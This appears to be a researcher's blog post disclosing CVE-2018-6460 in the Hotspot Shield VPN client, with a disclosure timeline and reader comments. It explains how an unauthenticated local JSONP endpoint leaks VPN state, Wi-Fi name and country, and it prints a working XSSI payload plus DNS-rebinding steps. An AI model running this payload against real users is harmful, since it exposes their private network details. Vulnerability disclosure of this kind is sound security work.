Hotspot Shield CVE-2018-6460, Sensitive Information Disclosure with XSSI & DNS Rebinding

1:07 AM


Lately, I’ve been interested in VPN clients. I was focusing my research on paid commercial VPN clients with 2M+ installs. one of the clients that stood out was Hotspot Shield, with similar builds on Android, Windows and Chrome. With each carrying over 3M+ installs worldwide.


While analyzing this application, I noticed its riddled with bugs that allow sensitive information disclosure. In this blog post, I will explore how it is possible to leak a user’s data, such as what wifi they are connected to while they are using Hotspot Shield.

Update Feb 8th, 2018: Hotspot Shield have released a patch that fixes these issues in version 7.4.6.

Details

Hotspot Shiled when turned on runs its own web server to communicate with its own VPN client. The server runs on a hardcoded host 127.0.0.1 and port 895. It hosts vital JSONP endpoints that return multiple interesting values and configuration data.

for example, http://localhost:895/status.js generates a sensitive JSON response that reveals whether the user is connected to VPN, to which VPN he/she is connected to what and what vpn network they are connected to, their country, network (wifi) name other information. There are other multiple endpoints that return sensitive data including configuration details.

$ curl -si http://127.0.0.1:895/status.js
HTTP/1.0 200 OK

{
“connect_state": "CONNECTED",
"daemon_state": {"timestamp": "1517471953", "state_name": "", "description": "HYDRA", "tun_ip":   "[reducted]", "remote_ip": "[reducted]", "network_name": "shitcakes", ", "country_code": "ET"}

}

While that endpoint is presented without any authorization, status.js is actually a JSON endpoint so there are no sensitive functions to override, but when we send the parameter func with $_APPLOG.Rfunc, it returns that function as a JSONP name. We can obviously override this in our malicious page and steal its contents by supplying a tm parameter timestamp, that way we can provide a logtime.


$_APPLOG.Rfunc({
“connect_state": "CONNECTED",
"daemon_state": {"timestamp": "1517471953", "state_name": "", "description": "HYDRA", "tun_ip":   "[reducted]", "remote_ip": "[reducted]", "network_name": "shitcakes", ", "country_code": "ET"

}})

However, many might say this attack is limited to LAN because of the address of the server, but this is where pull out an attack called dns rebining. In a DNS rebinding, any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost or 127.0.0.1 (making it accessible from the WAN) -- I suggest you to read Tavis Ormandy’s bug on Blizzard here.
You can use https://lock.cmpxchg8b.com/rebinder.html to generate a host name for use. You can alternate between 127.0.0.1 and 191.241.34.54 for example.

Similiar to Tavis’ post we now do the following to check,

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 191.241.34.54
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1

After the cache responses expire, the resolution will alternate between those two IP addresses and our binded ip address can steal the sensetive response with the following payload.

<script>
var $_APPLOG = function() { return 1; }
$_APPLOG.Rfunc = function(leak){
   alert(JSON.stringify(leak));
}
</script>
</head>
<script>
   var head = document.getElementsByTagName('head')[0];
   var script = document.createElement('script');
   script.id = 'jsonp';
   script.src = 'http://127.0.0.1:895/status.js?func=$_APPLOG.Rfunc&tm='+(new Date().getTime());
   head.appendChild(script);
</script>

Timeline

Mid November - multiple attempts to contact AnchorFree and HSS engineers.
Tue, Nov 28, 2017 - contacted Beyond Security's SSD for assistance with disclosure.
Sat, Jan 27, 2018 - beyond security confirms they've got neither a response nor an ETA for a fix.
Tue, Jan 30, 2018 - public disclosure as an SSD advisory (0day)
Wed, Jan 31, 2018 - CVE-2018-6460 assigned.
Wed, Feb 7th, 2018 - patch released with version 7.4.6






You Might Also Like

3 comments

  1. I just tried it and it worked. Soon after HSS did an auto-update, and now the url does not work anymore, browser says Connection Refused. That may not mean much, so perhaps you'd like to investigate again :-)

    ReplyDelete
  2. The user reviews here on hss are very negative as well https://www.vpnmentor.com/reviews/hotspot-shield/

    ReplyDelete
  3. There is already also evidence that HSS ist also part of the US Surveilance Programs to spy on citizens around the globe: https://vpn-anbieter-vergleich-test.de/hotspotshield/ (sorry it is in german)

    ReplyDelete

Note: Only a member of this blog may post a comment.